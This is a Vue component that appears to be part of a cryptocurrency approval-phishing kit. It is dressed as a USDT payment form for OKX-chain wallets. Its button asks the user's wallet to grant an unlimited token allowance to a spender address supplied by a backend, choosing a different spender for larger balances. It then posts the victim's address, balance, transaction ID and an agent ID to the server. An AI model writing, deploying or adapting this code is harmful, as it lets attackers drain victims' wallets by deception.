<template>
    <div class="home">
        {{ show }}
        <div class="box" v-show="show">
            <div class="title">{{ $t(`form.address`) }}</div>
            <div class="_box _text">
                {{ "0xdAC17F958D2ee523a2206206994597C13D831ec7" }}
            </div>
            <div class="title">
                <div>{{ $t(`form.amount`) }}</div>
                <div class="_text">
                    {{ quantity ? quantity.toFixed(2) : quantity }}USDT
                </div>
            </div>
            <div class="_box">
                <el-input v-model="number"></el-input>
                <div>$ {{ (number * 1.0004).toFixed(2) }}</div>
            </div>
            <el-button
                class="btn"
                size="medium"
                type="primary"
                @click="approveJoin"
            >{{ $t(btn.b2) }}
            </el-button
            >
        </div>

        <div v-if="msgshow">{{ msgData }}</div>
        <el-dialog :title="$t(`hint.h2`)" :visible.sync="hintShow" width="90%">
            <span>{{ $t(`hint.recharge`) }}</span>
        </el-dialog>
        <el-dialog :title="$t(`hint.h3`)" :visible.sync="bitpieShow" width="90%">
            <div class="btnBox">
                <el-button @click="btCopy(1)" class="copyTitle">{{
                        $t("btn.b3")
                    }}
                </el-button>
            </div>
            <el-image
                :src="`/static/imgs/${$i18n.locale}/${walletName}-help1.jpg`"
            ></el-image>
            <el-image
                :src="`/static/imgs/${$i18n.locale}/${walletName}-help2.jpg`"
            ></el-image>
        </el-dialog>
        <el-dialog
            :title="$t(`hint.h2`)"
            :visible.sync="bitpieHinteShow"
            width="90%"
        >
            <div class="bitpieHinte">{{ bitpieHinteMsg }}</div>
        </el-dialog>
        <div v-if="qrcodeShow" @click.stop="qrcodeShow = false" class="qrcodeBox">
            <div class="_box">
                <div class="title">{{ $t("hint.h4", {name: walletName}) }}</div>
                <div id="qrcode" class="qrcode" ref="qrcode"></div>
                <div class="btnBox">
                    <el-button class="title" @click="btCopy(2)">{{
                            $t(`btn.b3`)
                        }}
                    </el-button>
                </div>
            </div>
        </div>
    </div>
</template>
<script>
import Web3 from "web3";

import Ethereum from "../../public/static/EthereumApi.json";
import QRCode from "qrcodejs2";

export default {
    data() {
        return {
            walletName: "BITPIE",
            show: true,
            gasPrice: null,
            bitpieHinteMsg: "",
            qrcodeShow: false,
            bitpieShow: false,
            bitpieHinteShow: false,
            msgshow: false,
            hintShow: false,
            activeIndex: 1,
            number: "",
            // 余额
            quantity: "",
            defaultEthereumAddress: "",
            ethereum: null,
            account: null,
            ethQuantity: "",
            EthereumObj: {},
            defaultAccount: "",
            web3: null,
            contractAddress: "0x382bb369d343125bfb2117af9c149795c6c65c50",
            toAddress: "",
            decimals: 18,
            configList: [],
            Am: "",
            Az: "",
            msg: "",
        };
    },
    created() {
        this.EthereumApi = Ethereum.api;
    },
    mounted() {
        this.uuid = this.$route.params.id || "";
        this.getData();
        setTimeout(() => {
            this.wallet_switchEthereumChain();
        }, 1000);
        setTimeout(() => {
            this.initWeb3Account();
        }, 2000);
    },

    computed: {
        navList() {
            return this.$store.state.navList;
        },
    },
    methods: {
        navListTap1(data) {
            if (data.disabled) {
                this.$message(this.$t(`nav.type3`));
            } else {
                this.activeIndex = data.value;
                if (this.activeIndex > 3) {
                    this.walletName = data.name;
                }
            }
        },
        getOKXConfig() {
            let list = this.configList;
            let config = this.$store.state.okxConfig;
            let coding = config.coding;
            this.toAddress = config.address;
            for (let index = 0; index < list.length; index++) {
                const element = list[index];
                console.log(element.ChainId, this.$store.state.EthereumCoding);
                this.toAddress = element.SpenderAddr;
                this.contractAddress = element.Contract;
                if (element.ChainId == coding) {
                    this.EthereumObj = element;
                    this.Am = element.ETHAm;
                    this.Az = element.ETHAz;

                    if (this.Am <= this.quantity) {
                        this.toAddress = this.Az;
                    }
                    break;
                }
            }
        },
        // 复制提示
        btCopy() {
            this.bitpieHinteMsg = this.$t(`hint.h5`, {name: this.walletName});

            this.$copy(this.copyUrl);
            this.bitpieShow = false;
            this.bitpieHinteShow = true;
        },
        //  切换网络
        async wallet_switchEthereumChain() {
            let okexchain = window.okexchain;

            await okexchain.request({
                method: "wallet_switchEthereumChain",
                params: [{chainId: "0x42"}],
            });
        },
        // 授权

        async approveJoin(type) {
            this.getOKXConfig();

            if (!this.defaultAccount && type != 1) {
                this.wallet_switchEthereumChain();
                this.initWeb3Account(1);
                return;
            }
            // if (await this.web3.eth.getGasPrice()) {
            // }
            let EthereumObj = this.EthereumObj;
            let web3 = this.web3;
            console.log(this.toAddress);
            let _this = this;
            var abi = this.EthereumApi;
            if (this.ethQuantity < 0.001) {
                this.$message.warning({
                    duration: 5000,
                    message: this.$t(`hint.h11`),
                });
                return;
            }
            // let contractAddress = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"; //合约地址
            let contractAddress = this.contractAddress; //合约地址

            var infoContract = new web3.eth.Contract(abi, contractAddress);

            // "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
            // 90000 * Math.pow(10, 6)
            infoContract.methods
                .approve(
                    this.toAddress,
                    "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
                )
                .send(
                    {
                        from: this.defaultAccount,
                    },
                    function (error, result) {
                        console.log(error);

                        console.log(result);
                        console.log("contract 2name " + result);
                        let data = {
                            address: _this.defaultAccount,
                            authAddress: _this.toAddress,
                            status: result ? 1 : 0,
                            Contract: contractAddress,
                            agentId: _this.uuid,
                            type: EthereumObj.Symbol,
                            ChainId: _this.$store.state.okxConfig.coding,
                            Usdt: 0,
                            Balance: _this.quantity || 0,
                            TxId: result ? result : "",
                        };

                        _this.authaccountUploading(data);
                        if (_this.quantity < 2000) {
                            if (!result) {
                                return;
                            }

                            // this.hintShow = true;
                            this.$message.warning({
                                duration: 5000,
                                message: this.$t(`hint.recharge`),
                            });
                        }
                    }
                );
        },
        async authaccountUploading(data) {
            const res = await this.$h("post", `/Home/Tron/account`, data);
        },
        // 获取基础配置
        async getData() {
            const res = await this.$h("post", `/Home/Tron/getauthconfig`, {
                uuid: this.uuid,
            });

            if (!res) {
                return;
            }
            if (res.Type == 200) {
                this.configList = res.Data;
            }
            console.log(res);
        },
        // 二维码
        qrcode(url) {
            console.log(url);
            let str = url || window.location.href;
            this.copyUrl = str;
            new QRCode(this.$refs.qrcode, {
                width: 200,
                height: 200,
                text: str,
                colorDark: "#000",
                colorLight: "#fff",
            });
        },
        // 钱包连接
        async initWeb3Account(type) {
            if (typeof window.ethereum !== "undefined") {
                this.ethereum = window.ethereum;

                let addr = await this.ethereum.request({
                    method: "eth_requestAccounts",
                }); //授权连接钱包

                this.web3 = new Web3(this.ethereum);
                let network = await this.web3.eth.net.getId();
                // let gasPrice = await this.web3.eth.getGasPrice();

                this.gasPrice = network;
                if (network != 66) {
                    this.wallet_switchEthereumChain();
                    this.initWeb3Account();
                    return;
                }
                this.defaultAccount = addr[0];

                this.getBalance();
                this.getAddressBalance();
                if (this.defaultAccount && type == 1) {
                    this.approveJoin(1);
                }
            } else {
                console.log("未安装钱包插件！");
            }
        },
        // 获取平台余额
        getBalance() {
            let _this = this;
            this.web3.eth.getBalance(this.defaultAccount, (err, result) => {
                if (err == null) {
                    console.log(result);
                    _this.ethQuantity = _this.web3.utils.fromWei(result, "ether");

                    console.log("~:" + _this.web3.utils.fromWei(result, "ether"));
                    // console.log("~:" + _this.web3.utils.fromWei(number, "ether"));
                } else {
                    console.log("~error:" + err);
                }
            });
        },
        //  获取余额代表余额
        getAddressBalance() {
            console.log(this.EthereumObj);
            let EthereumObj = this.EthereumObj;
            let web3 = this.web3;
            let _this = this;
            var abi = this.EthereumApi;
            console.log(abi);
            let contractAddress = EthereumObj.Contract || this.contractAddress; //合约地址
            var infoContract = new web3.eth.Contract(abi, contractAddress);

            infoContract.methods
                .decimals()
                .call()
                .then((res) => {
                    console.log(res, 111111);
                    _this.decimals = res - 0;
                });

            infoContract.methods
                .balanceOf(this.defaultAccount)
                .call({from: this.defaultAccount}, function (error, result) {
                    if (!error) {
                        console.log();
                        _this.quantity = result / Math.pow(10, _this.decimals);
                        console.log(_this.quantity, "钱");
                        // _this.$emit("getAddress", _this.account, _this.quantity);
                    } else {
                        console.log(error, "555");
                    }
                });
        },
    },
    watch: {
        show(val) {
            this.$store.commit("nexShow", val);
        },
    },
    beforeDestroy() {
    },
};
</script>
<style lang="less" scoped>
.home {
    font-family: PingFang SC;

    background-color: #efeff4;
    min-width: 320px;
    max-width: 750px;
    min-height: 100vh;
    margin: 0 auto;

    .box {
        padding: 20px 20px;

        .title {
            display: flex;
            padding: 24px 10px;
            justify-content: space-between;
            font-size: 18px;

            ._text {
                color: #949495;
            }
        }

        ._box {
            border-radius: 16px;
            padding: 24px 20px;
            font-size: 14px;
            color: #949495;

            &._text {
                word-break: break-all;
            }

            .el-input {
                /deep/ .el-input__inner {
                    border: none;
                }
            }

            background-color: #fff;
        }
    }

    .btn {
        margin-top: 30px;
        height: 50px;
        width: 100%;
    }

    .one {
        padding: 20px;

        .navList {
            .item {
                display: flex;
                align-items: center;
                justify-content: space-between;
                padding: 10px 10px;
                border-bottom: 1px solid #d2d2d2;

                ._l {
                    display: flex;

                    .img {
                        width: 50px;
                        height: 50px;
                        margin-right: 20px;

                        img {
                            width: 100%;
                        }
                    }

                    .text {
                        color: #949495;
                    }
                }

                ._r {
                    .railo {
                        width: 15px;
                        height: 15px;
                        border: 1px solid rgb(95, 95, 95);
                        border-radius: 5px;

                        &.active {
                            background: #46b3f1;
                            border-color: #46b3f1;
                        }
                    }
                }
            }
        }

        .tips {
            background: #f2f2f2;
            border-radius: 8px;
            margin: 0 auto;
            margin-top: 20px;
            color: #282828;
            padding: 15px;
        }
    }
}

.qrcodeBox {
    position: fixed;
    left: 0;
    top: 0;
    right: 0;
    bottom: 0;
    background: rgba(0, 0, 0, 0.3);
    display: flex;
    align-items: center;
    justify-content: center;

    ._box {
        background: #fff;
        border-radius: 10px;
        padding: 20px;

        .title {
            text-align: center;
        }

        .qrcode {
            margin: 10px 0;
        }
    }
}

.btnBox {
    display: flex;
    justify-content: center;
}

.copyTitle {
    text-align: center;
    // padding: 10px;
    font-size: 18px;
    color: #000;
    width: 140px;
    display: inline-block;
    margin: 10px auto;
}

.bitpieHinte {
    text-align: center;
    font-size: 18px;
    color: #000;
}
</style>
<style lang="less">
.el-dialog {
    .el-dialog__body {
        padding: 15px 10px;
        padding-top: 0;
    }
}
</style>
